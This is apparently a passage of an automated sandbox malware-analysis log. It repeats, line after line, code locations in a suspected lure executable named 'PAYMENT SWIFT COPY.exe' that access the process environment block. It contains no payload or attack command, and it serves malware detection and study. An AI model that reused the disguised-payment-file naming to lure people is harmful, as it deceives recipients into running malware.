                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019120F0 mov ecx, dword ptr fs:[00000030h]8_2_019120F0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D80E9 mov eax, dword ptr fs:[00000030h]8_2_018D80E9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CA0E3 mov ecx, dword ptr fs:[00000030h]8_2_018CA0E3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019560E0 mov eax, dword ptr fs:[00000030h]8_2_019560E0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CC0F0 mov eax, dword ptr fs:[00000030h]8_2_018CC0F0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01954000 mov ecx, dword ptr fs:[00000030h]8_2_01954000
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01972000 mov eax, dword ptr fs:[00000030h]8_2_01972000
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01972000 mov eax, dword ptr fs:[00000030h]8_2_01972000
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01972000 mov eax, dword ptr fs:[00000030h]8_2_01972000
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01972000 mov eax, dword ptr fs:[00000030h]8_2_01972000
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01972000 mov eax, dword ptr fs:[00000030h]8_2_01972000
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01972000 mov eax, dword ptr fs:[00000030h]8_2_01972000
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01972000 mov eax, dword ptr fs:[00000030h]8_2_01972000
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01972000 mov eax, dword ptr fs:[00000030h]8_2_01972000
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EE016 mov eax, dword ptr fs:[00000030h]8_2_018EE016
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EE016 mov eax, dword ptr fs:[00000030h]8_2_018EE016
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EE016 mov eax, dword ptr fs:[00000030h]8_2_018EE016
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EE016 mov eax, dword ptr fs:[00000030h]8_2_018EE016
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01966030 mov eax, dword ptr fs:[00000030h]8_2_01966030
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CA020 mov eax, dword ptr fs:[00000030h]8_2_018CA020
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CC020 mov eax, dword ptr fs:[00000030h]8_2_018CC020
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956050 mov eax, dword ptr fs:[00000030h]8_2_01956050
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D2050 mov eax, dword ptr fs:[00000030h]8_2_018D2050
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FC073 mov eax, dword ptr fs:[00000030h]8_2_018FC073
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F438F mov eax, dword ptr fs:[00000030h]8_2_018F438F
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F438F mov eax, dword ptr fs:[00000030h]8_2_018F438F
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CE388 mov eax, dword ptr fs:[00000030h]8_2_018CE388
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CE388 mov eax, dword ptr fs:[00000030h]8_2_018CE388
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CE388 mov eax, dword ptr fs:[00000030h]8_2_018CE388
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C8397 mov eax, dword ptr fs:[00000030h]8_2_018C8397
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C8397 mov eax, dword ptr fs:[00000030h]8_2_018C8397
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C8397 mov eax, dword ptr fs:[00000030h]8_2_018C8397
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019743D4 mov eax, dword ptr fs:[00000030h]8_2_019743D4
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019743D4 mov eax, dword ptr fs:[00000030h]8_2_019743D4
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E3DB mov eax, dword ptr fs:[00000030h]8_2_0197E3DB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E3DB mov eax, dword ptr fs:[00000030h]8_2_0197E3DB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E3DB mov ecx, dword ptr fs:[00000030h]8_2_0197E3DB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E3DB mov eax, dword ptr fs:[00000030h]8_2_0197E3DB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA3C0 mov eax, dword ptr fs:[00000030h]8_2_018DA3C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA3C0 mov eax, dword ptr fs:[00000030h]8_2_018DA3C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA3C0 mov eax, dword ptr fs:[00000030h]8_2_018DA3C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA3C0 mov eax, dword ptr fs:[00000030h]8_2_018DA3C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA3C0 mov eax, dword ptr fs:[00000030h]8_2_018DA3C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA3C0 mov eax, dword ptr fs:[00000030h]8_2_018DA3C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D83C0 mov eax, dword ptr fs:[00000030h]8_2_018D83C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D83C0 mov eax, dword ptr fs:[00000030h]8_2_018D83C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D83C0 mov eax, dword ptr fs:[00000030h]8_2_018D83C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D83C0 mov eax, dword ptr fs:[00000030h]8_2_018D83C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198C3CD mov eax, dword ptr fs:[00000030h]8_2_0198C3CD
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019563C0 mov eax, dword ptr fs:[00000030h]8_2_019563C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E03E9 mov eax, dword ptr fs:[00000030h]8_2_018E03E9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E03E9 mov eax, dword ptr fs:[00000030h]8_2_018E03E9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E03E9 mov eax, dword ptr fs:[00000030h]8_2_018E03E9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E03E9 mov eax, dword ptr fs:[00000030h]8_2_018E03E9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E03E9 mov eax, dword ptr fs:[00000030h]8_2_018E03E9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E03E9 mov eax, dword ptr fs:[00000030h]8_2_018E03E9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E03E9 mov eax, dword ptr fs:[00000030h]8_2_018E03E9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E03E9 mov eax, dword ptr fs:[00000030h]8_2_018E03E9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019063FF mov eax, dword ptr fs:[00000030h]8_2_019063FF
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EE3F0 mov eax, dword ptr fs:[00000030h]8_2_018EE3F0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EE3F0 mov eax, dword ptr fs:[00000030h]8_2_018EE3F0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EE3F0 mov eax, dword ptr fs:[00000030h]8_2_018EE3F0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A30B mov eax, dword ptr fs:[00000030h]8_2_0190A30B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A30B mov eax, dword ptr fs:[00000030h]8_2_0190A30B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A30B mov eax, dword ptr fs:[00000030h]8_2_0190A30B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CC310 mov ecx, dword ptr fs:[00000030h]8_2_018CC310
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F0310 mov ecx, dword ptr fs:[00000030h]8_2_018F0310
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A8324 mov eax, dword ptr fs:[00000030h]8_2_019A8324
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A8324 mov ecx, dword ptr fs:[00000030h]8_2_019A8324
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A8324 mov eax, dword ptr fs:[00000030h]8_2_019A8324
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A8324 mov eax, dword ptr fs:[00000030h]8_2_019A8324
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01978350 mov ecx, dword ptr fs:[00000030h]8_2_01978350
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195035C mov eax, dword ptr fs:[00000030h]8_2_0195035C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195035C mov eax, dword ptr fs:[00000030h]8_2_0195035C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195035C mov eax, dword ptr fs:[00000030h]8_2_0195035C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195035C mov ecx, dword ptr fs:[00000030h]8_2_0195035C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195035C mov eax, dword ptr fs:[00000030h]8_2_0195035C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195035C mov eax, dword ptr fs:[00000030h]8_2_0195035C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199A352 mov eax, dword ptr fs:[00000030h]8_2_0199A352
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A634F mov eax, dword ptr fs:[00000030h]8_2_019A634F
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]8_2_01952349
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197437C mov eax, dword ptr fs:[00000030h]8_2_0197437C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E284 mov eax, dword ptr fs:[00000030h]8_2_0190E284
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E284 mov eax, dword ptr fs:[00000030h]8_2_0190E284
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01950283 mov eax, dword ptr fs:[00000030h]8_2_01950283
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01950283 mov eax, dword ptr fs:[00000030h]8_2_01950283
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01950283 mov eax, dword ptr fs:[00000030h]8_2_01950283
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E02A0 mov eax, dword ptr fs:[00000030h]8_2_018E02A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E02A0 mov eax, dword ptr fs:[00000030h]8_2_018E02A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019662A0 mov eax, dword ptr fs:[00000030h]8_2_019662A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019662A0 mov ecx, dword ptr fs:[00000030h]8_2_019662A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019662A0 mov eax, dword ptr fs:[00000030h]8_2_019662A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019662A0 mov eax, dword ptr fs:[00000030h]8_2_019662A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019662A0 mov eax, dword ptr fs:[00000030h]8_2_019662A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019662A0 mov eax, dword ptr fs:[00000030h]8_2_019662A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A62D6 mov eax, dword ptr fs:[00000030h]8_2_019A62D6
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA2C3 mov eax, dword ptr fs:[00000030h]8_2_018DA2C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA2C3 mov eax, dword ptr fs:[00000030h]8_2_018DA2C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA2C3 mov eax, dword ptr fs:[00000030h]8_2_018DA2C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA2C3 mov eax, dword ptr fs:[00000030h]8_2_018DA2C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA2C3 mov eax, dword ptr fs:[00000030h]8_2_018DA2C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E02E1 mov eax, dword ptr fs:[00000030h]8_2_018E02E1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E02E1 mov eax, dword ptr fs:[00000030h]8_2_018E02E1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E02E1 mov eax, dword ptr fs:[00000030h]8_2_018E02E1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C823B mov eax, dword ptr fs:[00000030h]8_2_018C823B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A625D mov eax, dword ptr fs:[00000030h]8_2_019A625D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198A250 mov eax, dword ptr fs:[00000030h]8_2_0198A250
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198A250 mov eax, dword ptr fs:[00000030h]8_2_0198A250
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D6259 mov eax, dword ptr fs:[00000030h]8_2_018D6259
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01958243 mov eax, dword ptr fs:[00000030h]8_2_01958243
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01958243 mov ecx, dword ptr fs:[00000030h]8_2_01958243
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CA250 mov eax, dword ptr fs:[00000030h]8_2_018CA250
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C826B mov eax, dword ptr fs:[00000030h]8_2_018C826B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4260 mov eax, dword ptr fs:[00000030h]8_2_018D4260
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4260 mov eax, dword ptr fs:[00000030h]8_2_018D4260
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4260 mov eax, dword ptr fs:[00000030h]8_2_018D4260
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E59C mov eax, dword ptr fs:[00000030h]8_2_0190E59C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D2582 mov eax, dword ptr fs:[00000030h]8_2_018D2582
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D2582 mov ecx, dword ptr fs:[00000030h]8_2_018D2582
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01904588 mov eax, dword ptr fs:[00000030h]8_2_01904588
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019505A7 mov eax, dword ptr fs:[00000030h]8_2_019505A7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019505A7 mov eax, dword ptr fs:[00000030h]8_2_019505A7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019505A7 mov eax, dword ptr fs:[00000030h]8_2_019505A7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F45B1 mov eax, dword ptr fs:[00000030h]8_2_018F45B1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F45B1 mov eax, dword ptr fs:[00000030h]8_2_018F45B1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A5D0 mov eax, dword ptr fs:[00000030h]8_2_0190A5D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A5D0 mov eax, dword ptr fs:[00000030h]8_2_0190A5D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D65D0 mov eax, dword ptr fs:[00000030h]8_2_018D65D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E5CF mov eax, dword ptr fs:[00000030h]8_2_0190E5CF
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E5CF mov eax, dword ptr fs:[00000030h]8_2_0190E5CF
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D25E0 mov eax, dword ptr fs:[00000030h]8_2_018D25E0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C5ED mov eax, dword ptr fs:[00000030h]8_2_0190C5ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C5ED mov eax, dword ptr fs:[00000030h]8_2_0190C5ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01966500 mov eax, dword ptr fs:[00000030h]8_2_01966500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE53E mov eax, dword ptr fs:[00000030h]8_2_018FE53E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE53E mov eax, dword ptr fs:[00000030h]8_2_018FE53E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE53E mov eax, dword ptr fs:[00000030h]8_2_018FE53E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE53E mov eax, dword ptr fs:[00000030h]8_2_018FE53E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE53E mov eax, dword ptr fs:[00000030h]8_2_018FE53E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8550 mov eax, dword ptr fs:[00000030h]8_2_018D8550
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8550 mov eax, dword ptr fs:[00000030h]8_2_018D8550
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190656A mov eax, dword ptr fs:[00000030h]8_2_0190656A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190656A mov eax, dword ptr fs:[00000030h]8_2_0190656A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190656A mov eax, dword ptr fs:[00000030h]8_2_0190656A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198A49A mov eax, dword ptr fs:[00000030h]8_2_0198A49A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019044B0 mov ecx, dword ptr fs:[00000030h]8_2_019044B0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195A4B0 mov eax, dword ptr fs:[00000030h]8_2_0195A4B0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D64AB mov eax, dword ptr fs:[00000030h]8_2_018D64AB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D04E5 mov ecx, dword ptr fs:[00000030h]8_2_018D04E5
